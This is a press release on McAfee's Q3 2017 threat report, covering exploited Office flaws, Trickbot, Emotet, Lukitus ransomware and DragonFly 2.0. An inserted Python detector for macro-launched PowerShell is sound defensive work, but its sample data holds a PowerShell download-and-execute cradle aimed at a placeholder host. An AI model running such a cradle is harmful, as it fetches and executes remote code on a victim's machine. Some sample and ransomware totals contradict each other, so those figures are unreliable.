McAfee Labs Report Sees Known Exploits and Fileless Malware Drive Record New Malware Surge

McAfee has released its McAfee Labs Threat Report: December 2017, examining the growth and trends of new malware, ransomware, and other threats in Q3 2017.

McAfee Labs saw malware reach an all-time high of 57.6 million new samples—four new samples per second—featuring developments such as new fileless malware using malicious macros, a new version of Locky ransomware dubbed Lukitus, and new variations of the banking Trojans Trickbot and Emotet. Threats attempting to exploit Microsoft technology vulnerabilities were very prominent despite the fact that the platform vendor addressed these issues with patches as early as the first quarter of 2017.

“The third quarter revealed that attackers’ threat designs continue to benefit from the dynamic, benign capabilities of platform technologies like PowerShell, a reliable recklessness on the part of individual phishing victims, and what seems to be an equally reliable failure of organizations to patch known vulnerabilities with available security updates,” said Raj Samani, McAfee’s Chief Scientist. “Although attackers will always seek ways to use newly developed innovations and established platforms against us, our industry perhaps faces a greater challenge in the effort to influence individuals and organizations away from becoming their own worst enemies.”

Each quarter, McAfee Labs assesses the state of the cyber threat landscape based on threat data gathered by the McAfee Global Threat Intelligence cloud from hundreds of millions of sensors across multiple threat vectors around the world. McAfee Advanced Threat Intelligence complements McAfee Labs by providing in-depth investigative analysis of cyberattacks from around the globe.

Known Vulnerabilities Exploited

The third quarter of 2017 saw cybercriminals continue to take advantage of Microsoft Office vulnerabilities such as CVE-2017-0199, a flaw in both Microsoft Office and WordPad that allows remote code execution through specially crafted files. To carry out this attack, many used a tool available via GitHub that offers an easy route to creating a backdoor without complex configuration.

New variations of the Trickbot banking Trojan featured code that embedded the EternalBlue exploit responsible for the massive WannaCry and NotPetya ransomware outbreaks in Q2. Despite Microsoft’s continued efforts to counter EternalBlue with security patches, the new Trickbot authors still found the proven technique to be effective. They combined it with new features such as cryptocurrency theft and new delivery methods, and made these new Trickbot versions the most active banking Trojans in Q3.

“Once vulnerabilities are discovered and disclosed ‘into the wild,’ or the hacker community, they present a blueprint for malicious parties seeking to develop sophisticated threats that exploit them,” said Steve Grobman, Chief Technology Officer at McAfee. “The year 2017 will be remembered as the time when such vulnerabilities were exploited to orchestrate large-scale cyber events, including the WannaCry and NotPetya ransomware outbreaks, and high-profile breaches such as at Equifax. Only by investing more in the discovery and remediation of cyber vulnerabilities can technology vendors, governments, and business enterprises hope to gain a step on the cybercriminals working furiously to uncover and take advantage of them.”

Fileless Threats

Fileless threats continued to be a growing concern in Q3, with PowerShell malware growing by 119%. Very prominent in this category was the Emotet banking Trojan, which spread around the world through large spam campaigns that lured users into downloading Microsoft Word documents. Opening these documents inadvertently activates a PowerShell macro that downloads and installs the malware on the victim's system.

“Although many cyberattacks continue to rely on the exploitation of basic security vulnerabilities, exposures, and user behaviors, fileless threats leverage the utility of our own system capabilities,” said Vincent Weafer, Vice President for McAfee Labs. “By leveraging trusted applications or gaining access to native system operating tools such as PowerShell or JavaScript, attackers have made the development leap forward to take control of computers without downloading any executable files, at least in the initial stages of the attack.”
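The macro-to-PowerShell chain described above leaves a characteristic trace in process-creation telemetry: an Office application spawning powershell.exe with hidden-window or encoded-command flags and a download cradle in the command line. The following detector is an added example written for this page, not McAfee's code or any product logic; the event field names (`parent`, `image`, `cmdline`), the scoring weights and the sample events are all constructed assumptions, and the base64 payload is generated inline from a constructed string so the decode path can be exercised offline.

```python
import base64
import re

# Office applications that should rarely, if ever, launch a shell interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Keywords common to PowerShell download cradles (also checked in decoded payloads).
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"invoke-expression|\biex\b|start-bitstransfer", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Flags used to hide the window, skip profiles or bypass execution policy.
EVASION_RE = re.compile(
    r"-(?:w|windowstyle)\s+hidden|-nop\b|-noprofile|"
    r"-(?:ep|exec|executionpolicy)\s+bypass", re.IGNORECASE)

# Assumed weights: parent/cradle dominate, flags alone are weak signals.
WEIGHTS = {"office_parent": 3, "encoded_command": 2, "download_cradle": 3, "evasion_flags": 1}


def decode_b64_utf16(blob):
    """PowerShell -EncodedCommand is base64 over UTF-16LE; return None if not decodable."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Return (score, reasons) for one process-creation record (constructed schema)."""
    parent = ev["parent"].rsplit("\\", 1)[-1].lower()
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmdline"]
    reasons = []
    if image not in ("powershell.exe", "pwsh.exe"):
        return 0, reasons
    if parent in OFFICE_PARENTS:
        reasons.append("office_parent")
    decoded = ""
    m = ENCODED_RE.search(cmd)
    if m:
        reasons.append("encoded_command")
        decoded = decode_b64_utf16(m.group(1)) or ""
    # Scan the visible command line and the decoded payload together.
    if CRADLE_RE.search(cmd + " " + decoded):
        reasons.append("download_cradle")
    if EVASION_RE.search(cmd):
        reasons.append("evasion_flags")
    return sum(WEIGHTS[r] for r in reasons), reasons


def detect_fileless_chain(events, threshold=5):
    """Flag events whose combined indicators reach the (assumed) alert threshold."""
    findings = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            findings.append({"cmdline": ev["cmdline"], "score": score, "reasons": reasons})
    return findings


# Constructed sample telemetry; the URL host is a reserved invalid domain.
_CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
_ENCODED = base64.b64encode(_CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\WINWORD.EXE"
SAMPLE_EVENTS = [
    {"parent": WORD, "image": PS,
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + _ENCODED},
    {"parent": WORD, "image": PS,
     "cmdline": "powershell -w hidden -c \"" + _CONSTRUCTED_SCRIPT + "\""},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},          # benign admin script
    {"parent": WORD, "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe 12288"},                                    # Word printing helper
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell -enc " + _ENCODED},                           # cradle, non-Office parent
]

if __name__ == "__main__":
    for f in detect_fileless_chain(SAMPLE_EVENTS):
        print(f["score"], f["reasons"], f["cmdline"][:60])
```

The scoring keeps a benign scheduled script (explorer.exe launching a .ps1) below the threshold while still flagging an encoded cradle whose parent is not an Office process, which matters when the macro stages through cmd.exe or wscript.exe first. In production the same logic would be fed from Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled, and PowerShell Script Block Logging (Event ID 4104) gives the decoded script directly.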

Lukitus Ransomware

One of the key developments in the ransomware space was the emergence of Lukitus, a new version of Locky ransomware. The ransomware was distributed by more than 23 million spam emails within the first 24 hours of the attack. Overall in the category, new ransomware samples increased by 36%. The number of total ransomware samples has grown 44% in the past four quarters to 12.3 million samples.

DragonFly: New Industries, New Objectives

The McAfee Advanced Threat Research team found that DragonFly 2.0, the malware discovered earlier in 2017 in the energy sector, has targeted organizations beyond those in the original discoveries, including the pharmaceutical, financial services, and accounting industries. These attacks were initiated through spear-phishing emails, luring recipients to click on links that download the Trojan and provide attackers with network access.

“The actors involved in the DragonFly 2.0 attacks have a reputation for initiating attacks for the purpose of conducting reconnaissance on the inner workings of targeted sectors—with energy and pharmaceutical confirmed as top priorities,” said Christiaan Beek, McAfee Lead Scientist and Principal Engineer. “The intellectual property and insider insights they obtain upon gaining access to targeted sectors is of tremendous economic value.”

Q3 2017 Threat Activity

Security incidents. McAfee Labs counted 263 publicly disclosed security incidents in Q3, a decrease of 15% from Q2. More than 60% of all publicly disclosed security incidents in Q3 took place in the Americas.

Vertical industry targets. The health and public sectors accounted for more than 40% of total incidents in Q3.

North America. Health sector attacks continued to lead vertical sectors in Q3 security incidents.
Asia. Public sector, followed by technology and individual attacks, led in reported Q3 incidents.
Europe, Oceania and Africa. Public sector attacks led reported Q3 incidents.
Attack vectors. Account hijacking led disclosed attack vectors, followed by leaks, malware, DDoS, and targeted attacks.

Mobile malware. Total mobile malware continued to grow, reaching 21.1 million samples. New mobile malware increased by 60% from Q2, largely due to a rapid increase in Android screen-locking ransomware.

Malware overall. New malware samples increased in Q3 to 57.5 million, a 10% increase. The total number of malware samples grew 27% in the past four quarters to almost 781 million samples.

Fileless malware. While JavaScript malware growth slowed by 26% in Q3, PowerShell malware more than doubled with 119%.

Ransomware. New ransomware samples rose by 36% in Q3. The total number of new ransomware samples grew 14% in the last quarter to 12.2 million samples.

Mac malware. Mac OS malware samples increased by 7% in Q3.

Macro malware. Total macro malware continued to grow, increasing by 8% in Q3.

Spam campaigns. The Gamut botnet remained the most prevalent spamming botnet during Q3, with the Necurs botnet a close second. Necurs proliferated several Ykcol (Locky) ransomware campaigns throughout the quarter with themes such as “Status Invoice,” “Your Payment,” and “Emailing: [Random Numbers] JPG.”